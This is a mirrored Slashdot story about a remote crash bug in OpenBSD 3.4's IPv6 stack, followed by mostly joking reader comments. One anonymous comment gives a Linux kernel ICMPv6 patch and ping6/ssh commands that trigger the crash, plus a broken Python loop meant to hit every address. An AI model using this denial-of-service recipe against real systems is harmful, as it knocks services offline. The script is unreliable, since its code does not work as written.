Slashdot Mirror

← Back to Stories (view on slashdot.org)

Remotely Crash OpenBSD

Posted by CowboyNeal on from the even-the-best-of-us dept.

*no comment* writes "If you are running OpenBSD on your IPv6 install, it might be time to upgrade to -current. (just kidding) There is, however, a way to crash OpenBSD 3.4 with a couple of simple IPv6 commands. Georgi Guninski, found the problem. To quote Theo, 'it is just a crash.'" It is unknown if the bug could be used to execute arbitrary code, but it does require patching a Linux kernel (or rolling your own network stack) to exploit.

20 of 407 comments (clear)

  1. Oh well... by Seoulstriker · · Score: 5, Funny

    I think it's time to upgrade to windows.

    --
    I am defenseless. Use your button. Mod me down with all of your hatred.
    1. Re:Oh well... by NanoGator · · Score: 4, Funny

      "Upgrade what,... maybe... your stress level???"

      Vice City relieves that.

      --
      "Derp de derp."
    2. Re:Oh well... by HalliS · · Score: 5, Funny
      • I think it's time to upgrade to windows.


      Wrong. The openbsd people obviously included this "crash feature" just so that windows people could feel at home with OpenBSD. I think it's time for Windows folks to switch to OpenBSD.
      --


      My other UID is 1337
  2. Re:Double standards? by Anonymous Coward · · Score: 5, Funny

    if someone from Microsoft stated "It's just a crash"

    Yeah, but on Windows, how can you tell the difference?

    (Admit it, you asked for it)

  3. Crash or Slash? by Halthar · · Score: 5, Funny

    Great, now when I try and check the linked article and cant get there I am left wondering if it was Slashdotted or if someone crashed the servers using the exploit.

    Hell, who knows, maybe this one is Google's fault too.

  4. So this is why... by Tomy · · Score: 4, Funny

    ...my BSD is dying...

  5. What are the chances.... by Anonymous Coward · · Score: 2, Funny

    Now let's see ... what are the chances of finding both an OpenBSD server (an unpatched one at that) and IPv6 network in the same place? I think I'd better stick to plausible worries like lighting strikes, seatbelt failures, and choking to death on my turkey dinners.

  6. Re:Slashdotted by cgenman · · Score: 2, Funny

    His server is running on OpenBSD. It is only a matter of time before some smart a$$ crashes it.

    --
    The ______ Agenda
  7. Re:Remotely? by Anonymous Coward · · Score: 1, Funny

    No, the BSD has to patch the ATTACKERS IPv6 to crash THE packet linux victim ROLL YOUR OWN!

  8. It's only a crash....fun with python by Anonymous Coward · · Score: 3, Funny

    Hey but is only a crash nothing at all to worry about...

    Patch linux kernel 2.4.24 net/ipv6/icmp.c :

    case ICMPV6_ECHO_REPLY: /* we coulnd't care less */
    icmpv6_send(skb, ICMPV6_PKT_TOOBIG, 0, 68, skb->dev); //joro

    then:
    ping6 openbsd
    ssh -6 openbsd

    #!/usr/bin/python
    import popen2,string

    def cmd_execute(cmd):
    p = popen2.Popen3(cmd)
    p.wait()
    return string.strip(p.fromchild.read())

    #kill everybody
    for a in range(0,255):
    for b in range(0,255):
    for c in range(0,255):
    for d in range(0,255):
    execute('ping6 ' + a + '.' + b + '.' + c + '.' + d)
    execute('ssh -6 ' + a + '.' + b + '.' + c + '.' + d)

  9. damn! by Anonymous Coward · · Score: 1, Funny

    good thing nobody uses IPv6 and never will! :-)

  10. Re:Remotely? by Anonymous Coward · · Score: 1, Funny
    What am I missing here?
    Literacy.
  11. Re:Maybe not... by Zebedeu · · Score: 2, Funny
    Note: I am not an OpenBSD apologist... I am a Mac apologist.

    Steve?
    Now now, don't be so hard on yourself, we don't really think it's necessary to apologise :)

  12. Re:OpenBSD crashes: how could it have been prevent by Penguinshit · · Score: 4, Funny


    The good thing about ports is that, due to their alcohol and tannin content, you *CAN* leave them open much longer than more typical wines. I have a nice port (Fonseca) sitting open on my bar at home. I take a couple of nips from it every evening, and then replace the glass stopper on the carafe. It is a wonderful way to end the work-day. Go grab yourself a 10-year Tawny and you'll see what I mean.

    You do need to be careful with how many ports you have open. I find after a couple of ports my work product increases. After a few more, it tends to decrease, exponentially going downhill with each subsequent port. You need to be especially careful with a root prompt and several open ports late at night.

    For extra kicks, blind taste a Tawny against a Madeira.

    Enjoy.

    --

    I have something in common with Stephen Hawking...

  13. Re:Oh wow by mr_death · · Score: 3, Funny

    My ip address is 127.0.0.1. Knock yourself out.

    --
    It's Linux, damnit! Pay no attention to renaming attempts by self-aggrandizing blowhards.
  14. and the linux zealots cried out by ShadowRage · · Score: 3, Funny

    "our linux crashed your openbsd!"

  15. Re:Oh wow by gpinzone · · Score: 4, Funny

    Wow! You've got a ton of porn on there!

  16. What Theo really said.... by One+Louder · · Score: 4, Funny



    To quote Theo, 'it is just a wardrobe malfunction.'"

  17. Mod Parent Humor-Impaired Down Please by Tomy · · Score: 3, Funny


    Troll?!? It was humor, you insensitive clod.

  18. And spyder inc. got their stack from by konmaskisin · · Score: 4, Funny

    a complete clean room implementation using engineers that didn't read BSD TCP/IP code in school ...

    yeah right ...